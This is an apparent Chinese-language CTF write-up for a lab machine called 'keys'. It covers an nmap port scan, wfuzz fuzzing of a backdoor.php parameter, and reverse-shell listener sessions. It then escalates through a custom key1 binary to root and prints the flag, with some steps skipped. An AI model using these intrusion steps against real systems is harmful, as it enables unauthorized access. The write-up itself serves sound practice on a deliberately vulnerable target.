# Nmap 7.95 scan initiated Fri Feb 27 00:04:11 2026 as: /usr/lib/nmap/nmap -p- -oA ports 192.168.0.104 Nmap scan report for interstellar.dsz (192.168.0.104) Host is up (0.00077s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy MAC Address: A6:DD:95:39:CF:90 (Unknown)
# Nmap done at Fri Feb 27 00:04:13 2026 -- 1 IP address (1 host up) scanned in 2.15 seconds
web 渗透
80 端口 和 8080 端口都是 web ,初步访问发现两个 web 页面是一样的,都没有什么内容。但是 80 端口的网页源代码里面写了 keys1.dsz:
┌──(kali㉿kali)-[~/HMV/keys] └─$ wfuzz -w /usr/share/wordlists/fuzzDicts/paramDict/AllParam.txt -u 'http://192.168.0.106:8080/backdoor.php?FUZZ=id' --hh 0 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.0.106:8080/backdoor.php?FUZZ=id Total requests: 74332 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 200 1 L 3 W 54 Ch "0"
┌──(kali㉿kali)-[~] └─$ nc -nvlp 1234 Listening on 0.0.0.0 1234 Connection received on 192.168.0.106 36342 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@64a2813cdab1:/var/www/html$ whoami whoami www-data www-data@64a2813cdab1:/var/www/html$
该环境的 home 目录下没有用户,且 uname -a 的结果显示其 hostname 是 64a2813cdab1 。推测这是一个 docker 起的环境。
┌──(kali㉿kali)-[~] └─$ nc -nvlp 4567 Listening on 0.0.0.0 4567 Connection received on 192.168.0.106 57742 id uid=33(www-data) gid=33(www-data) groups=33(www-data) uname -a Linux Key1 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 GNU/Linux
ww-data@Key1:/usr/local/bin$ ls -liah ls -liah total 28K 263399 drwxr-xr-x 2 root root 4.0K Feb 15 07:15 . 263395 drwxr-xr-x 10 root root 4.0K Mar 18 2025 .. 527707 -rwx--x--x 1 root root 18K Feb 15 07:15 key1
看一下帮助信息:
1 2 3 4 5 6 7 8
www-data@Key1:/usr/local/bin$ ./key1 -h ./key1 -h Options: -h, --help Display this help message and exit -p, --password PASSWORD Output root password format with provided password Standard logic: 1. Reads users from /opt/user.txt 2. Compares current user with a selected user
他说他会从 /opt/user.txt 里面读取用户名,然后比较当前用户和选中的用户。
简单运行一下:
1 2 3 4
www-data@Key1:/usr/local/bin$ ./key1 ./key1 Current user: www-data Now is user sublarge turn
sublarge@Key1:/usr/local/bin$ su root Password: root@Key1:/usr/local/bin# ls key1 root@Key1:/usr/local/bin# cd root@Key1:~# ls Dockerfile rootpasss.txt root.txt run_backdoor.sh userpass.txt root@Key1:~# cat root.txt flag{root-2d8e0ca998ebd0a3abdee36468170c99}